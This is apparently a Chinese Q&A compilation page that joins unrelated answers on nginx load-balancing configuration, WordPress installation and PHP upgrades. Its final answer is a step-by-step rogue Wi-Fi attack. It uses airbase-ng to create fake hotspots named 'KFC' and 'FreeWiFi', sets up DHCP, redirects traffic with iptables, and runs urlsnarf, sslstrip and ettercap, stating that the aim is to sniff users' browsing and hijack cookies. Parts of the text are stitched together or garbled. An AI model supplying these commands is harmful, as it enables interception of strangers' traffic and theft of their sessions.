怎么添加php命令,nginx如何配置?
Nginx概述Nginx是lgor Sysoev为俄罗斯访问量第二的rambler.ru站点设计开发的。从2004年发布至今,凭借开源的力量,已经接近成熟与完善。
Nginx功能丰富,可作为HTTP服务器,也可作为反向代理服务器,邮件服务器。支持FastCGI、SSL、Virtual Host、URL Rewrite、Gzip等功能。并且支持很多第三方的模块扩展。
修改Nginx目录下nginx.conf配置文件,如下所示:
upstream server {
ip_hash;
server 192.168.200.129:80; #第一台负载的ip及端口
server 192.168.200.131:80; #第二台负载的ip及端口
}
server {
listen 80;
server_name localhost Nginx_ip;
location / {
proxy_pass http://server;
proxy_redirect default;
}
}
参数说明upstreamupstream模块主要负责负载均衡的配置,通过默认的轮询调度方式来分发请求到后端服务器。
upstream backend {
server backend1.example.com weight=5;
server backend2.example.com fail_timeout=5s slow_start=30s;
server backend3.example.com resolve;
server backend4.example.com service=http resolve;
server backup1.example.com backup;
server backup2.example.com backup;
}
serverserver模块配置是http模块中的一个子模块,用来定义一个虚拟访问主机。
server {
listen 80;
server_name localhost nginx_ip;
root /nginx/www;
index index.php index.html index.html;
charset utf-8;
access_log logs/access.log;
error_log logs/error.log;
}
locationlocation模块配置在路由访问信息配置中关联到反向代理、负载均衡等等各项功能。
语法规则: location [=|~|~*|^~] /uri/ { … }
多个location优先级:首先匹配 =,其次匹配^~, 其次是按文件中顺序的正则匹配,最后是交给 / 通用匹配。当有匹配成功时候,停止匹配,按当前匹配规则处理请求。
location / {
root /nginx/www;
index index.php index.html index.htm;
}
location ^~ /test {
proxy_pass http://backend;
proxy_redirect off;
proxy_set_header Host $host;
}
location /:表示匹配访问根目录。
root:用于指定访问根目录时,访问虚拟主机的web目录。
index:在不指定访问具体资源时,默认展示的资源文件列表。
如果解决了你的疑惑,请点点关注和评论,谢谢支持。
正春华枝俏,待秋实果茂,与君共勉。
如何快速搭建Wordpress网站?
首先,WordPress是一个开源的网站博客程序。
您可以去它的官网(cn.wordpress.org)上,下载安装包到您的虚拟主机上进行安装。
以下为安装步骤的图片,请您收下。
PHP版本过低要怎么升级?
先用phpinfo查看当前版本使用的php模块,里面有个编译选项,记录下来。停止APACHE, 在apache中找到libphp库,改个名。下载高版本的php编译,make && make install。如果php是以cgi模式运行其实只需要一个php命令行文件就可以。
phptype命令参数详解?
php echo "参数{$argc}"; print_r($argv); ?>其他命令暂时还没用到!怎么转发所有客户端请求到指定ip?
方案1:iwconfig命令查看是否成功识别airmon-ng命令查看无线网卡情况,找到接入的USB无线网卡名称,airmon-ng start wlan2命令使USB无线网卡工作在监听模式; airbase-ng –e “KFC” –c 11 wlan0mon命令并回车,这样就生成了一个工作在11频道、SSID名称为“KFC”的热点; ifconfig –a命令,查看接口网卡at0是否存在,确认存在后, ifconfig at0 up命令启动接口网卡at0; 配置DHCP服务的各项参数,vim /etc/dhcp/dhcpd.conf命令并回车,开始编辑isc-dhcpd软件的配置文件,其中:ddns-update-style none表示不自动更新DNS与DHCP服务器的动态信息subnet 192.168.100.0 netmask 255.255.255.0表示IP地址段为192.168.100.0/24,子网掩码为255.255.255.0range 192.168.100.50 192.168.100.100表示用于分配的IP地址为.50-.200option subnet-mask 设置子网掩码,option broadcast-address设置广播地址option routers 192.168.100.1表示设置网关为192.168.100.1option domain-name-servers 10.0.1.106表示设置DNS解析服务器为10.0.1.106 配置详细:subnet 192.168.100.0 netmask 255.255.255.0 {range 192.168.100.50 192.168.100.200;option subnet-mask255.255.255.0; #子网掩码option broadcast-address192.168.100.255; #广播地址option routers192.168.100.1; #网关option domain-name-sercers10.0.1.106; #DNS解析服务器,.106这个ip是bt5的(另外一台虚拟机)default-lease-time 21600;max-lease-time 43200;} 编辑好后,按“Esc”键,敲入“:wq”保存退出.ifconfig at0 192.168.100.1 netmask 255.255.255.0命令并回车,设置接口网卡at0的ip地址和子网掩码;route add –net 192.168.100.0 netmask 255.255.255.0 gw 192.168.100.1命令并回车,表示增加一条路由记录,使192.168.100.1网关生效;dhcpd –d –f –cf /etc/dhcp/dhcpd.conf at0命令并回车,启动DHCP服务; 打开新的终端echo 1 > /proc/sys/net/ipv4/ip_forward命令并回车,开启系统数据转发功能;iptables –t nat –A POSTROUTING --out-interface eth0 –j MASQUERADE命令并回车,设置iptables转发,将所有数据转发到eth0网卡;urlsnarf –i at0启动urlsnarf软件,嗅探输出at0网卡上所有HTTP访问记录; 方案2:使用 airbase-ng + dhcpd 创建虚拟WiFi热点;顺便使用 sslstrip+ettercap 进行中间人攻击,嗅探使用者的上网信息和劫持cookie!所需要的软件如下;kali-linux都已经自带了,其他的系统可以自行安装:Aircrack-ng 套件 #用来发送数据isc-dhcp-server #简单的dhcp服务器sslstrip #突破ssl加密ettercap #嗅探劫持vim /etc/dhcp/dhcpd.conf 编辑dhcp服务器配置文件,修改如下:authoritative;default-lease-time 700;max-lease-time 8000;subnet 10.0.0.0 netmask 255.255.255.0 {option routers 10.0.0.1;option subnet-mask 255.255.255.0;option domain-name "FreeWiFi";option domain-name-servers 10.0.0.1;range 10.0.0.10 10.0.0.100; }然后激活网卡至监听模式:airmon-ng start wlan0airbase-ng -e FreeWiFi -c 6 mon0此时虚拟wifi的信号已经发送出去了,如果出现错误:Error: Got channel -1, expected a value > 0.执行如下命令:airmon-ng stop mon0ifconfig wlan0 downiwconfig wlan0 mode monitorifconfig wlan0 up然后从激活网卡至监听模式那里重新开始。接着执行如下命令:ifconfig at0 upifconfig at0 10.0.0.1 netmask 255.255.255.0ifconfig at0 mtu 1400route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1iptables --flushiptables --table nat --flushiptables --delete-chainiptables --table nat --delete-chainecho 1 > /proc/sys/net/ipv4/ip_forwardiptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1iptables -P FORWARD ACCEPTiptables --append FORWARD --in-interface at0 -j ACCEPTiptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADEiptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0/etc/init.d/isc-dhcp-server start虚拟WiFir热点创建成功,接下来就是嗅探欺骗钓鱼了:sslstrip -fpk 10000ettercap -Tpuqi at0